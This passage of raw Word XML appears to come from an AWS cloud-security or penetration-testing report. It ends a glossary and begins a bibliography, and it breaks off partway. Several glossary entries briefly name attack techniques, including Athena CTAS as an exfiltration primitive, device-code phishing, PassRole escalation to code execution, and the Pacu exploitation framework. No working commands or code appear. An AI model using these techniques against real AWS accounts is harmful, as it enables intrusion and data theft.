          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> An unauthenticated-or-federated-identity service that exchanges a federated identity for AWS session credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B11FA2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Confused deputy.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> An attack pattern in which a trusted service is induced to perform an action on behalf of an untrusted caller. AWS's ExternalId/SourceArn/SourceAccount conditions mitigate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB7BAB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CTAS.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>CREATE TABLE AS SELECT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Athena; an exfiltration primitive that copies query results to an external S3 location in one API call.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1283A58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Customer Managed Key (CMK).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> A KMS key managed by the customer; has a separately editable key policy; cross-account shareable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F72D13C"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Data event.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> CloudTrail events for object-level operations (S3 GetObject, Lambda Invoke, DynamoDB item operations). Off by default; billed separately.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D1E1C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Device-code flow.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> An OAuth 2.0 authorization flow used by IAM Identity Center; susceptible to phishing attacks where the attacker transmits the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>user code</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> to a victim.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58CFA09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ExternalId.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> A shared-secret condition used in role trust policies to mitigate confused-deputy risk.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30502F5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GuardDuty.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>AWS's threat-detection service; produces findings from CloudTrail, VPC Flow Logs, DNS logs, and (optionally) runtime monitoring.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3449A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IMDS.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> Instance Metadata Service; serves instance metadata and instance-profile credentials at 169.254.169.254. IMDSv2 requires a PUT-token flow.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63FAAF4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Identity Center (AWS IAM Identity Center).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> Formerly AWS SSO; a federation and permission-set service that spans an AWS Organization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23245E8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IRSA (IAM Roles for Service Accounts).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> EKS's mechanism for giving pods IAM roles via OIDC federation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454AA83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KMS grant.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> A permission primitive on a KMS key that allows a principal to perform specific operations; created with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>kms:CreateGrant</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C255ED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Lambda layer.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>A reusable code bundle that multiple Lambda functions can import; a supply-chain surface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B5264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OIDC provider.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> An external identity provider registered in IAM for federated access; tokens from the provider can be exchanged for AWS session credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="608AD53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OrganizationAccountAccessRole.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> A role created in each member account by AWS Organizations that grants full admin access to the Organizations management account.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4921EA1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Pacu.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> Rhino Security Labs's open-source AWS exploitation framework.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351DF85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PassRole.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> An IAM action that permits a principal to pass a role to a service; a bridge from IAM-level permissions to service-level RCE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59CC7A0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Permission boundary.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> An IAM policy that sets the maximum permissions a principal can have, regardless of what other policies grant.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1472D56F"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PMapper.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> NCC Group's open-source IAM-graph tool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1472CA3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Pod Identity.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> EKS's newer (2023+) mechanism for giving pods IAM credentials via a local agent rather than OIDC federation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C426A7"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Resource policy.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> An IAM policy attached to a resource (as opposed to a principal); governs cross-account and cross-service access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0B8E84"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Role chaining.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> Assuming a role from a session that is itself an assumed-role session. Capped at 1 hour session duration regardless of role configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78671A1E"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SCP (Service Control Policy).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> An Organizations-level policy that sets the maximum permissions available in accounts within an OU. Does not grant permissions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2661EBA2"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Session policy.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> An inline policy passed to AssumeRole / GetSessionToken that further narrows the resulting session's permissions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15996DB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ScoutSuite.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> NCC Group's open-source AWS audit tool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A129A0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Service-linked role.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> An IAM role that an AWS service creates in the customer's account to perform operations on its behalf.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76AB3616"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SourceIdentity.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> A caller-asserted identity propagated through role chains; visible in CloudTrail.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2146D16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STS.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> AWS Security Token Service; issues temporary credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34DBDCA5"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TruffleHog.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> An open-source Git-secret scanner with live credential verification.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71AC6E52"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VPC endpoint policy.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> A policy attached to a VPC endpoint that restricts which principals or actions may transit the endpoint.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F112B75" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Bibliography</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50BD2874" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Primary AWS documentation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C5DB36"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Amazon Web Services, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>IAM User Guide</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CloudTrail User Guide</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GuardDuty Finding Types Reference</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Organizations User Guide</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IAM Identity Center User Guide</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KMS Developer Guide</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Customer Support Policy for Penetration Testing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Amazon Web Services, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Shared Responsibility Model</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58775DC3" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Vendor research and blog posts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7654F60D"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Rhino Security Labs, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>AWS IAM Privilege Escalation – Methods and Mitigation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Spencer Gietzen). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Rhino Security Labs, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>CloudGoat scenario documentation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Bishop Fox, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>CloudFox release documentation and blog series</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">NCC Group, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>ScoutSuite documentation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>PMapper release notes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Datadog Security Labs, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Stratus Red Team technique catalogue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>State of Cloud Security 2023</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Mandiant, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>UNC3944 / Scattered Spider analyses</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Wiz, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Cloud threat landscape reports</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Permiso, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>LUCR-3 and related AWS-targeting intrusion reports</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3470465C" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Conference talks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52481827"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fwd:cloudsec conference proceedings (annual). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Black Hat USA cloud-security track (selected years). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">DEF CON Cloud Village (selected years). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">BSides talks archived by </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>irongeek</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:br/>
        <w:t>AWS re:Inforce session recordings (selected years).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D37D1D" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
